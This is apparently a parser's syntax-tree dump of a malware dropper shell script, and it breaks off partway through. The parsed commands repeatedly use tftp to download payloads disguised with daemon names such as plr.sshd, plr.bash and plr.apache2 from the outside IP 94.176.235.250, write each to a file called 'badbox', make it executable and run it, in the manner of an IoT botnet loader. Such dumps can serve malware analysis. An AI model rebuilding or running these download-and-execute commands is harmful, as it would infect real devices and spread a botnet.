CommandNode(lineno=2, pos=(12, 26), parts=[
  WordNode(lineno=2, pos=(12, 18), word='ulimit'),
  WordNode(lineno=2, pos=(19, 21), word='-n'),
  WordNode(lineno=2, pos=(22, 26), word='1024'),
])
CommandNode(lineno=3, pos=(27, 48), parts=[
  WordNode(lineno=3, pos=(27, 29), word='cp'),
  WordNode(lineno=3, pos=(30, 42), word='/bin/busybox'),
  WordNode(lineno=3, pos=(43, 48), word='/tmp/'),
])
ListNode(lineno=4, pos=(49, 179), parts=[
  CommandNode(lineno=4, pos=(49, 56), parts=[
    WordNode(lineno=4, pos=(49, 51), word='cd'),
    WordNode(lineno=4, pos=(52, 56), word='/tmp'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(57, 59)),
  CommandNode(lineno=4, pos=(60, 71), parts=[
    WordNode(lineno=4, pos=(60, 62), word='cd'),
    WordNode(lineno=4, pos=(63, 71), word='/var/run'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(72, 74)),
  CommandNode(lineno=4, pos=(75, 82), parts=[
    WordNode(lineno=4, pos=(75, 77), word='cd'),
    WordNode(lineno=4, pos=(78, 82), word='/mnt'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(83, 85)),
  CommandNode(lineno=4, pos=(86, 94), parts=[
    WordNode(lineno=4, pos=(86, 88), word='cd'),
    WordNode(lineno=4, pos=(89, 94), word='/root'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(95, 97)),
  CommandNode(lineno=4, pos=(98, 102), parts=[
    WordNode(lineno=4, pos=(98, 100), word='cd'),
    WordNode(lineno=4, pos=(101, 102), word='/'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(102, 103)),
  CommandNode(lineno=4, pos=(104, 138), parts=[
    WordNode(lineno=4, pos=(104, 108), word='tftp'),
    WordNode(lineno=4, pos=(109, 111), word='-r'),
    WordNode(lineno=4, pos=(112, 120), word='plr.ntpd'),
    WordNode(lineno=4, pos=(121, 123), word='-g'),
    WordNode(lineno=4, pos=(124, 138), word='94.176.235.250'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(138, 139)),
  CommandNode(lineno=4, pos=(139, 159), parts=[
    WordNode(lineno=4, pos=(139, 142), word='cat'),
    WordNode(lineno=4, pos=(143, 151), word='plr.ntpd'),
    RedirectNode(lineno=4, output=
      WordNode(lineno=4, pos=(153, 159), word='badbox'), pos=(152, 159), type='>'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(159, 160)),
  CommandNode(lineno=4, pos=(160, 170), parts=[
    WordNode(lineno=4, pos=(160, 165), word='chmod'),
    WordNode(lineno=4, pos=(166, 168), word='+x'),
    WordNode(lineno=4, pos=(169, 170), word='*'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(170, 171)),
  CommandNode(lineno=4, pos=(171, 179), parts=[
    WordNode(lineno=4, pos=(171, 179), word='./badbox'),
  ]),
])
ListNode(lineno=5, pos=(180, 310), parts=[
  CommandNode(lineno=5, pos=(180, 187), parts=[
    WordNode(lineno=5, pos=(180, 182), word='cd'),
    WordNode(lineno=5, pos=(183, 187), word='/tmp'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(188, 190)),
  CommandNode(lineno=5, pos=(191, 202), parts=[
    WordNode(lineno=5, pos=(191, 193), word='cd'),
    WordNode(lineno=5, pos=(194, 202), word='/var/run'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(203, 205)),
  CommandNode(lineno=5, pos=(206, 213), parts=[
    WordNode(lineno=5, pos=(206, 208), word='cd'),
    WordNode(lineno=5, pos=(209, 213), word='/mnt'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(214, 216)),
  CommandNode(lineno=5, pos=(217, 225), parts=[
    WordNode(lineno=5, pos=(217, 219), word='cd'),
    WordNode(lineno=5, pos=(220, 225), word='/root'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(226, 228)),
  CommandNode(lineno=5, pos=(229, 233), parts=[
    WordNode(lineno=5, pos=(229, 231), word='cd'),
    WordNode(lineno=5, pos=(232, 233), word='/'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(233, 234)),
  CommandNode(lineno=5, pos=(235, 269), parts=[
    WordNode(lineno=5, pos=(235, 239), word='tftp'),
    WordNode(lineno=5, pos=(240, 242), word='-r'),
    WordNode(lineno=5, pos=(243, 251), word='plr.sshd'),
    WordNode(lineno=5, pos=(252, 254), word='-g'),
    WordNode(lineno=5, pos=(255, 269), word='94.176.235.250'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(269, 270)),
  CommandNode(lineno=5, pos=(270, 290), parts=[
    WordNode(lineno=5, pos=(270, 273), word='cat'),
    WordNode(lineno=5, pos=(274, 282), word='plr.sshd'),
    RedirectNode(lineno=5, output=
      WordNode(lineno=5, pos=(284, 290), word='badbox'), pos=(283, 290), type='>'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(290, 291)),
  CommandNode(lineno=5, pos=(291, 301), parts=[
    WordNode(lineno=5, pos=(291, 296), word='chmod'),
    WordNode(lineno=5, pos=(297, 299), word='+x'),
    WordNode(lineno=5, pos=(300, 301), word='*'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(301, 302)),
  CommandNode(lineno=5, pos=(302, 310), parts=[
    WordNode(lineno=5, pos=(302, 310), word='./badbox'),
  ]),
])
ListNode(lineno=6, pos=(311, 447), parts=[
  CommandNode(lineno=6, pos=(311, 318), parts=[
    WordNode(lineno=6, pos=(311, 313), word='cd'),
    WordNode(lineno=6, pos=(314, 318), word='/tmp'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(319, 321)),
  CommandNode(lineno=6, pos=(322, 333), parts=[
    WordNode(lineno=6, pos=(322, 324), word='cd'),
    WordNode(lineno=6, pos=(325, 333), word='/var/run'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(334, 336)),
  CommandNode(lineno=6, pos=(337, 344), parts=[
    WordNode(lineno=6, pos=(337, 339), word='cd'),
    WordNode(lineno=6, pos=(340, 344), word='/mnt'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(345, 347)),
  CommandNode(lineno=6, pos=(348, 356), parts=[
    WordNode(lineno=6, pos=(348, 350), word='cd'),
    WordNode(lineno=6, pos=(351, 356), word='/root'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(357, 359)),
  CommandNode(lineno=6, pos=(360, 364), parts=[
    WordNode(lineno=6, pos=(360, 362), word='cd'),
    WordNode(lineno=6, pos=(363, 364), word='/'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(364, 365)),
  CommandNode(lineno=6, pos=(366, 403), parts=[
    WordNode(lineno=6, pos=(366, 370), word='tftp'),
    WordNode(lineno=6, pos=(371, 373), word='-r'),
    WordNode(lineno=6, pos=(374, 385), word='plr.openssh'),
    WordNode(lineno=6, pos=(386, 388), word='-g'),
    WordNode(lineno=6, pos=(389, 403), word='94.176.235.250'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(403, 404)),
  CommandNode(lineno=6, pos=(404, 427), parts=[
    WordNode(lineno=6, pos=(404, 407), word='cat'),
    WordNode(lineno=6, pos=(408, 419), word='plr.openssh'),
    RedirectNode(lineno=6, output=
      WordNode(lineno=6, pos=(421, 427), word='badbox'), pos=(420, 427), type='>'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(427, 428)),
  CommandNode(lineno=6, pos=(428, 438), parts=[
    WordNode(lineno=6, pos=(428, 433), word='chmod'),
    WordNode(lineno=6, pos=(434, 436), word='+x'),
    WordNode(lineno=6, pos=(437, 438), word='*'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(438, 439)),
  CommandNode(lineno=6, pos=(439, 447), parts=[
    WordNode(lineno=6, pos=(439, 447), word='./badbox'),
  ]),
])
ListNode(lineno=7, pos=(448, 578), parts=[
  CommandNode(lineno=7, pos=(448, 455), parts=[
    WordNode(lineno=7, pos=(448, 450), word='cd'),
    WordNode(lineno=7, pos=(451, 455), word='/tmp'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(456, 458)),
  CommandNode(lineno=7, pos=(459, 470), parts=[
    WordNode(lineno=7, pos=(459, 461), word='cd'),
    WordNode(lineno=7, pos=(462, 470), word='/var/run'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(471, 473)),
  CommandNode(lineno=7, pos=(474, 481), parts=[
    WordNode(lineno=7, pos=(474, 476), word='cd'),
    WordNode(lineno=7, pos=(477, 481), word='/mnt'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(482, 484)),
  CommandNode(lineno=7, pos=(485, 493), parts=[
    WordNode(lineno=7, pos=(485, 487), word='cd'),
    WordNode(lineno=7, pos=(488, 493), word='/root'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(494, 496)),
  CommandNode(lineno=7, pos=(497, 501), parts=[
    WordNode(lineno=7, pos=(497, 499), word='cd'),
    WordNode(lineno=7, pos=(500, 501), word='/'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(501, 502)),
  CommandNode(lineno=7, pos=(503, 537), parts=[
    WordNode(lineno=7, pos=(503, 507), word='tftp'),
    WordNode(lineno=7, pos=(508, 510), word='-r'),
    WordNode(lineno=7, pos=(511, 519), word='plr.bash'),
    WordNode(lineno=7, pos=(520, 522), word='-g'),
    WordNode(lineno=7, pos=(523, 537), word='94.176.235.250'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(537, 538)),
  CommandNode(lineno=7, pos=(538, 558), parts=[
    WordNode(lineno=7, pos=(538, 541), word='cat'),
    WordNode(lineno=7, pos=(542, 550), word='plr.bash'),
    RedirectNode(lineno=7, output=
      WordNode(lineno=7, pos=(552, 558), word='badbox'), pos=(551, 558), type='>'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(558, 559)),
  CommandNode(lineno=7, pos=(559, 569), parts=[
    WordNode(lineno=7, pos=(559, 564), word='chmod'),
    WordNode(lineno=7, pos=(565, 567), word='+x'),
    WordNode(lineno=7, pos=(568, 569), word='*'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(569, 570)),
  CommandNode(lineno=7, pos=(570, 578), parts=[
    WordNode(lineno=7, pos=(570, 578), word='./badbox'),
  ]),
])
ListNode(lineno=8, pos=(579, 709), parts=[
  CommandNode(lineno=8, pos=(579, 586), parts=[
    WordNode(lineno=8, pos=(579, 581), word='cd'),
    WordNode(lineno=8, pos=(582, 586), word='/tmp'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(587, 589)),
  CommandNode(lineno=8, pos=(590, 601), parts=[
    WordNode(lineno=8, pos=(590, 592), word='cd'),
    WordNode(lineno=8, pos=(593, 601), word='/var/run'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(602, 604)),
  CommandNode(lineno=8, pos=(605, 612), parts=[
    WordNode(lineno=8, pos=(605, 607), word='cd'),
    WordNode(lineno=8, pos=(608, 612), word='/mnt'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(613, 615)),
  CommandNode(lineno=8, pos=(616, 624), parts=[
    WordNode(lineno=8, pos=(616, 618), word='cd'),
    WordNode(lineno=8, pos=(619, 624), word='/root'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(625, 627)),
  CommandNode(lineno=8, pos=(628, 632), parts=[
    WordNode(lineno=8, pos=(628, 630), word='cd'),
    WordNode(lineno=8, pos=(631, 632), word='/'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(632, 633)),
  CommandNode(lineno=8, pos=(634, 668), parts=[
    WordNode(lineno=8, pos=(634, 638), word='tftp'),
    WordNode(lineno=8, pos=(639, 641), word='-r'),
    WordNode(lineno=8, pos=(642, 650), word='plr.tftp'),
    WordNode(lineno=8, pos=(651, 653), word='-g'),
    WordNode(lineno=8, pos=(654, 668), word='94.176.235.250'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(668, 669)),
  CommandNode(lineno=8, pos=(669, 689), parts=[
    WordNode(lineno=8, pos=(669, 672), word='cat'),
    WordNode(lineno=8, pos=(673, 681), word='plr.tftp'),
    RedirectNode(lineno=8, output=
      WordNode(lineno=8, pos=(683, 689), word='badbox'), pos=(682, 689), type='>'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(689, 690)),
  CommandNode(lineno=8, pos=(690, 700), parts=[
    WordNode(lineno=8, pos=(690, 695), word='chmod'),
    WordNode(lineno=8, pos=(696, 698), word='+x'),
    WordNode(lineno=8, pos=(699, 700), word='*'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(700, 701)),
  CommandNode(lineno=8, pos=(701, 709), parts=[
    WordNode(lineno=8, pos=(701, 709), word='./badbox'),
  ]),
])
ListNode(lineno=9, pos=(710, 840), parts=[
  CommandNode(lineno=9, pos=(710, 717), parts=[
    WordNode(lineno=9, pos=(710, 712), word='cd'),
    WordNode(lineno=9, pos=(713, 717), word='/tmp'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(718, 720)),
  CommandNode(lineno=9, pos=(721, 732), parts=[
    WordNode(lineno=9, pos=(721, 723), word='cd'),
    WordNode(lineno=9, pos=(724, 732), word='/var/run'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(733, 735)),
  CommandNode(lineno=9, pos=(736, 743), parts=[
    WordNode(lineno=9, pos=(736, 738), word='cd'),
    WordNode(lineno=9, pos=(739, 743), word='/mnt'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(744, 746)),
  CommandNode(lineno=9, pos=(747, 755), parts=[
    WordNode(lineno=9, pos=(747, 749), word='cd'),
    WordNode(lineno=9, pos=(750, 755), word='/root'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(756, 758)),
  CommandNode(lineno=9, pos=(759, 763), parts=[
    WordNode(lineno=9, pos=(759, 761), word='cd'),
    WordNode(lineno=9, pos=(762, 763), word='/'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(763, 764)),
  CommandNode(lineno=9, pos=(765, 799), parts=[
    WordNode(lineno=9, pos=(765, 769), word='tftp'),
    WordNode(lineno=9, pos=(770, 772), word='-r'),
    WordNode(lineno=9, pos=(773, 781), word='plr.wget'),
    WordNode(lineno=9, pos=(782, 784), word='-g'),
    WordNode(lineno=9, pos=(785, 799), word='94.176.235.250'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(799, 800)),
  CommandNode(lineno=9, pos=(800, 820), parts=[
    WordNode(lineno=9, pos=(800, 803), word='cat'),
    WordNode(lineno=9, pos=(804, 812), word='plr.wget'),
    RedirectNode(lineno=9, output=
      WordNode(lineno=9, pos=(814, 820), word='badbox'), pos=(813, 820), type='>'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(820, 821)),
  CommandNode(lineno=9, pos=(821, 831), parts=[
    WordNode(lineno=9, pos=(821, 826), word='chmod'),
    WordNode(lineno=9, pos=(827, 829), word='+x'),
    WordNode(lineno=9, pos=(830, 831), word='*'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(831, 832)),
  CommandNode(lineno=9, pos=(832, 840), parts=[
    WordNode(lineno=9, pos=(832, 840), word='./badbox'),
  ]),
])
ListNode(lineno=10, pos=(841, 971), parts=[
  CommandNode(lineno=10, pos=(841, 848), parts=[
    WordNode(lineno=10, pos=(841, 843), word='cd'),
    WordNode(lineno=10, pos=(844, 848), word='/tmp'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(849, 851)),
  CommandNode(lineno=10, pos=(852, 863), parts=[
    WordNode(lineno=10, pos=(852, 854), word='cd'),
    WordNode(lineno=10, pos=(855, 863), word='/var/run'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(864, 866)),
  CommandNode(lineno=10, pos=(867, 874), parts=[
    WordNode(lineno=10, pos=(867, 869), word='cd'),
    WordNode(lineno=10, pos=(870, 874), word='/mnt'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(875, 877)),
  CommandNode(lineno=10, pos=(878, 886), parts=[
    WordNode(lineno=10, pos=(878, 880), word='cd'),
    WordNode(lineno=10, pos=(881, 886), word='/root'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(887, 889)),
  CommandNode(lineno=10, pos=(890, 894), parts=[
    WordNode(lineno=10, pos=(890, 892), word='cd'),
    WordNode(lineno=10, pos=(893, 894), word='/'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(894, 895)),
  CommandNode(lineno=10, pos=(896, 930), parts=[
    WordNode(lineno=10, pos=(896, 900), word='tftp'),
    WordNode(lineno=10, pos=(901, 903), word='-r'),
    WordNode(lineno=10, pos=(904, 912), word='plr.cron'),
    WordNode(lineno=10, pos=(913, 915), word='-g'),
    WordNode(lineno=10, pos=(916, 930), word='94.176.235.250'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(930, 931)),
  CommandNode(lineno=10, pos=(931, 951), parts=[
    WordNode(lineno=10, pos=(931, 934), word='cat'),
    WordNode(lineno=10, pos=(935, 943), word='plr.cron'),
    RedirectNode(lineno=10, output=
      WordNode(lineno=10, pos=(945, 951), word='badbox'), pos=(944, 951), type='>'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(951, 952)),
  CommandNode(lineno=10, pos=(952, 962), parts=[
    WordNode(lineno=10, pos=(952, 957), word='chmod'),
    WordNode(lineno=10, pos=(958, 960), word='+x'),
    WordNode(lineno=10, pos=(961, 962), word='*'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(962, 963)),
  CommandNode(lineno=10, pos=(963, 971), parts=[
    WordNode(lineno=10, pos=(963, 971), word='./badbox'),
  ]),
])
ListNode(lineno=11, pos=(972, 1100), parts=[
  CommandNode(lineno=11, pos=(972, 979), parts=[
    WordNode(lineno=11, pos=(972, 974), word='cd'),
    WordNode(lineno=11, pos=(975, 979), word='/tmp'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(980, 982)),
  CommandNode(lineno=11, pos=(983, 994), parts=[
    WordNode(lineno=11, pos=(983, 985), word='cd'),
    WordNode(lineno=11, pos=(986, 994), word='/var/run'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(995, 997)),
  CommandNode(lineno=11, pos=(998, 1005), parts=[
    WordNode(lineno=11, pos=(998, 1000), word='cd'),
    WordNode(lineno=11, pos=(1001, 1005), word='/mnt'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1006, 1008)),
  CommandNode(lineno=11, pos=(1009, 1017), parts=[
    WordNode(lineno=11, pos=(1009, 1011), word='cd'),
    WordNode(lineno=11, pos=(1012, 1017), word='/root'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1018, 1020)),
  CommandNode(lineno=11, pos=(1021, 1025), parts=[
    WordNode(lineno=11, pos=(1021, 1023), word='cd'),
    WordNode(lineno=11, pos=(1024, 1025), word='/'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1025, 1026)),
  CommandNode(lineno=11, pos=(1027, 1060), parts=[
    WordNode(lineno=11, pos=(1027, 1031), word='tftp'),
    WordNode(lineno=11, pos=(1032, 1034), word='-r'),
    WordNode(lineno=11, pos=(1035, 1042), word='plr.ftp'),
    WordNode(lineno=11, pos=(1043, 1045), word='-g'),
    WordNode(lineno=11, pos=(1046, 1060), word='94.176.235.250'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1060, 1061)),
  CommandNode(lineno=11, pos=(1061, 1080), parts=[
    WordNode(lineno=11, pos=(1061, 1064), word='cat'),
    WordNode(lineno=11, pos=(1065, 1072), word='plr.ftp'),
    RedirectNode(lineno=11, output=
      WordNode(lineno=11, pos=(1074, 1080), word='badbox'), pos=(1073, 1080), type='>'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1080, 1081)),
  CommandNode(lineno=11, pos=(1081, 1091), parts=[
    WordNode(lineno=11, pos=(1081, 1086), word='chmod'),
    WordNode(lineno=11, pos=(1087, 1089), word='+x'),
    WordNode(lineno=11, pos=(1090, 1091), word='*'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1091, 1092)),
  CommandNode(lineno=11, pos=(1092, 1100), parts=[
    WordNode(lineno=11, pos=(1092, 1100), word='./badbox'),
  ]),
])
ListNode(lineno=12, pos=(1101, 1231), parts=[
  CommandNode(lineno=12, pos=(1101, 1108), parts=[
    WordNode(lineno=12, pos=(1101, 1103), word='cd'),
    WordNode(lineno=12, pos=(1104, 1108), word='/tmp'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1109, 1111)),
  CommandNode(lineno=12, pos=(1112, 1123), parts=[
    WordNode(lineno=12, pos=(1112, 1114), word='cd'),
    WordNode(lineno=12, pos=(1115, 1123), word='/var/run'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1124, 1126)),
  CommandNode(lineno=12, pos=(1127, 1134), parts=[
    WordNode(lineno=12, pos=(1127, 1129), word='cd'),
    WordNode(lineno=12, pos=(1130, 1134), word='/mnt'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1135, 1137)),
  CommandNode(lineno=12, pos=(1138, 1146), parts=[
    WordNode(lineno=12, pos=(1138, 1140), word='cd'),
    WordNode(lineno=12, pos=(1141, 1146), word='/root'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1147, 1149)),
  CommandNode(lineno=12, pos=(1150, 1154), parts=[
    WordNode(lineno=12, pos=(1150, 1152), word='cd'),
    WordNode(lineno=12, pos=(1153, 1154), word='/'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1154, 1155)),
  CommandNode(lineno=12, pos=(1156, 1190), parts=[
    WordNode(lineno=12, pos=(1156, 1160), word='tftp'),
    WordNode(lineno=12, pos=(1161, 1163), word='-r'),
    WordNode(lineno=12, pos=(1164, 1172), word='plr.pftp'),
    WordNode(lineno=12, pos=(1173, 1175), word='-g'),
    WordNode(lineno=12, pos=(1176, 1190), word='94.176.235.250'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1190, 1191)),
  CommandNode(lineno=12, pos=(1191, 1211), parts=[
    WordNode(lineno=12, pos=(1191, 1194), word='cat'),
    WordNode(lineno=12, pos=(1195, 1203), word='plr.pftp'),
    RedirectNode(lineno=12, output=
      WordNode(lineno=12, pos=(1205, 1211), word='badbox'), pos=(1204, 1211), type='>'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1211, 1212)),
  CommandNode(lineno=12, pos=(1212, 1222), parts=[
    WordNode(lineno=12, pos=(1212, 1217), word='chmod'),
    WordNode(lineno=12, pos=(1218, 1220), word='+x'),
    WordNode(lineno=12, pos=(1221, 1222), word='*'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1222, 1223)),
  CommandNode(lineno=12, pos=(1223, 1231), parts=[
    WordNode(lineno=12, pos=(1223, 1231), word='./badbox'),
  ]),
])
ListNode(lineno=13, pos=(1232, 1358), parts=[
  CommandNode(lineno=13, pos=(1232, 1239), parts=[
    WordNode(lineno=13, pos=(1232, 1234), word='cd'),
    WordNode(lineno=13, pos=(1235, 1239), word='/tmp'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1240, 1242)),
  CommandNode(lineno=13, pos=(1243, 1254), parts=[
    WordNode(lineno=13, pos=(1243, 1245), word='cd'),
    WordNode(lineno=13, pos=(1246, 1254), word='/var/run'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1255, 1257)),
  CommandNode(lineno=13, pos=(1258, 1265), parts=[
    WordNode(lineno=13, pos=(1258, 1260), word='cd'),
    WordNode(lineno=13, pos=(1261, 1265), word='/mnt'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1266, 1268)),
  CommandNode(lineno=13, pos=(1269, 1277), parts=[
    WordNode(lineno=13, pos=(1269, 1271), word='cd'),
    WordNode(lineno=13, pos=(1272, 1277), word='/root'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1278, 1280)),
  CommandNode(lineno=13, pos=(1281, 1285), parts=[
    WordNode(lineno=13, pos=(1281, 1283), word='cd'),
    WordNode(lineno=13, pos=(1284, 1285), word='/'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1285, 1286)),
  CommandNode(lineno=13, pos=(1287, 1319), parts=[
    WordNode(lineno=13, pos=(1287, 1291), word='tftp'),
    WordNode(lineno=13, pos=(1292, 1294), word='-r'),
    WordNode(lineno=13, pos=(1295, 1301), word='plr.sh'),
    WordNode(lineno=13, pos=(1302, 1304), word='-g'),
    WordNode(lineno=13, pos=(1305, 1319), word='94.176.235.250'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1319, 1320)),
  CommandNode(lineno=13, pos=(1320, 1338), parts=[
    WordNode(lineno=13, pos=(1320, 1323), word='cat'),
    WordNode(lineno=13, pos=(1324, 1330), word='plr.sh'),
    RedirectNode(lineno=13, output=
      WordNode(lineno=13, pos=(1332, 1338), word='badbox'), pos=(1331, 1338), type='>'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1338, 1339)),
  CommandNode(lineno=13, pos=(1339, 1349), parts=[
    WordNode(lineno=13, pos=(1339, 1344), word='chmod'),
    WordNode(lineno=13, pos=(1345, 1347), word='+x'),
    WordNode(lineno=13, pos=(1348, 1349), word='*'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1349, 1350)),
  CommandNode(lineno=13, pos=(1350, 1358), parts=[
    WordNode(lineno=13, pos=(1350, 1358), word='./badbox'),
  ]),
])
ListNode(lineno=14, pos=(1359, 1487), parts=[
  CommandNode(lineno=14, pos=(1359, 1366), parts=[
    WordNode(lineno=14, pos=(1359, 1361), word='cd'),
    WordNode(lineno=14, pos=(1362, 1366), word='/tmp'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1367, 1369)),
  CommandNode(lineno=14, pos=(1370, 1381), parts=[
    WordNode(lineno=14, pos=(1370, 1372), word='cd'),
    WordNode(lineno=14, pos=(1373, 1381), word='/var/run'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1382, 1384)),
  CommandNode(lineno=14, pos=(1385, 1392), parts=[
    WordNode(lineno=14, pos=(1385, 1387), word='cd'),
    WordNode(lineno=14, pos=(1388, 1392), word='/mnt'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1393, 1395)),
  CommandNode(lineno=14, pos=(1396, 1404), parts=[
    WordNode(lineno=14, pos=(1396, 1398), word='cd'),
    WordNode(lineno=14, pos=(1399, 1404), word='/root'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1405, 1407)),
  CommandNode(lineno=14, pos=(1408, 1412), parts=[
    WordNode(lineno=14, pos=(1408, 1410), word='cd'),
    WordNode(lineno=14, pos=(1411, 1412), word='/'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1412, 1413)),
  CommandNode(lineno=14, pos=(1414, 1447), parts=[
    WordNode(lineno=14, pos=(1414, 1418), word='tftp'),
    WordNode(lineno=14, pos=(1419, 1421), word='-r'),
    WordNode(lineno=14, pos=(1422, 1429), word='plr.nut'),
    WordNode(lineno=14, pos=(1430, 1432), word='-g'),
    WordNode(lineno=14, pos=(1433, 1447), word='94.176.235.250'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1447, 1448)),
  CommandNode(lineno=14, pos=(1448, 1467), parts=[
    WordNode(lineno=14, pos=(1448, 1451), word='cat'),
    WordNode(lineno=14, pos=(1452, 1459), word='plr.nut'),
    RedirectNode(lineno=14, output=
      WordNode(lineno=14, pos=(1461, 1467), word='badbox'), pos=(1460, 1467), type='>'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1467, 1468)),
  CommandNode(lineno=14, pos=(1468, 1478), parts=[
    WordNode(lineno=14, pos=(1468, 1473), word='chmod'),
    WordNode(lineno=14, pos=(1474, 1476), word='+x'),
    WordNode(lineno=14, pos=(1477, 1478), word='*'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1478, 1479)),
  CommandNode(lineno=14, pos=(1479, 1487), parts=[
    WordNode(lineno=14, pos=(1479, 1487), word='./badbox'),
  ]),
])
ListNode(lineno=15, pos=(1488, 1624), parts=[
  CommandNode(lineno=15, pos=(1488, 1495), parts=[
    WordNode(lineno=15, pos=(1488, 1490), word='cd'),
    WordNode(lineno=15, pos=(1491, 1495), word='/tmp'),
  ]),
  OperatorNode(lineno=15, op='||', pos=(1496, 1498)),
  CommandNode(lineno=15, pos=(1499, 1510), parts=[
    WordNode(lineno=15, pos=(1499, 1501), word='cd'),
    WordNode(lineno=15, pos=(1502, 1510), word='/var/run'),
  ]),
  OperatorNode(lineno=15, op='||', pos=(1511, 1513)),
  CommandNode(lineno=15, pos=(1514, 1521), parts=[
    WordNode(lineno=15, pos=(1514, 1516), word='cd'),
    WordNode(lineno=15, pos=(1517, 1521), word='/mnt'),
  ]),
  OperatorNode(lineno=15, op='||', pos=(1522, 1524)),
  CommandNode(lineno=15, pos=(1525, 1533), parts=[
    WordNode(lineno=15, pos=(1525, 1527), word='cd'),
    WordNode(lineno=15, pos=(1528, 1533), word='/root'),
  ]),
  OperatorNode(lineno=15, op='||', pos=(1534, 1536)),
  CommandNode(lineno=15, pos=(1537, 1541), parts=[
    WordNode(lineno=15, pos=(1537, 1539), word='cd'),
    WordNode(lineno=15, pos=(1540, 1541), word='/'),
  ]),
  OperatorNode(lineno=15, op=';', pos=(1541, 1542)),
  CommandNode(lineno=15, pos=(1543, 1580), parts=[
    WordNode(lineno=15, pos=(1543, 1547), word='tftp'),
    WordNode(lineno=15, pos=(1548, 1550), word='-r'),
    WordNode(lineno=15, pos=(1551, 1562), word='plr.apache2'),
    WordNode(lineno=15, pos=(1563, 1565), word='-g'),
    WordNode(lineno=15, pos=(1566, 1580), word='94.176.235.250'),
  ]),
  OperatorNode(lineno=15, op=';', pos=(1580, 1581)),
  CommandNode(lineno=15, pos=(1581, 1604), parts=[
    WordNode(lineno=15, pos=(1581, 1584), word='cat'),
    WordNode(lineno=15, pos=(1585, 1596), word='plr.apache2'),
    RedirectNode(lineno=15, output=
      WordNode(lineno=15, pos=(1598, 1604), word='badbox'), pos=(1597, 1604), type='>'),
  ]),
  OperatorNode(lineno=15, op=';', pos=(1604, 1605)),
